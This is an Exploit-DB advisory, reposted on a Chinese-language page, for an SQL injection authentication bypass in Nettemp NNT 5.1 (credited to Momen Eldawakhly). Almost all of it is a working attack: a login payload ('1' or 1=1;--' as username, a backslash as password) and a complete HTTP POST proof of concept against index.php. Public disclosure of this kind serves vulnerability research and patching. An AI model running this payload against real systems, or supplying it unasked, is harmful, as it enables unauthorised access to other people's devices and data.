Nettmp NNT 5.1 – SQLi Authentication Bypass

  • 作者: Momen Eldawakhly
    日期: 2022-01-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50627/
  • # Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass
    # Date: 23/12/2021
    # Exploit Author: Momen Eldawakhly (Cyber Guy)
    # Vendor Homepage: https://wiki.nettemp.tk
    # Software Link: https://wiki.nettemp.tk
    # Version: nettmp NNT
    # Tested on: Linux (Ubuntu 20.04)
    
    Payload:
    
    username: 1' or 1=1;--
    password: \
    
    Proof of Concept:
    
    POST /index.php?id=status HTTP/1.1
    Host: vuln.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 55
    Origin: http://vuln.com
    DNT: 1
    Connection: close
    Referer: http://vulnIP/index.php?id=status
    Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq
    Upgrade-Insecure-Requests: 1
    
    username=1%27+or+1%3D1%3B--&password=%5C&form_login=log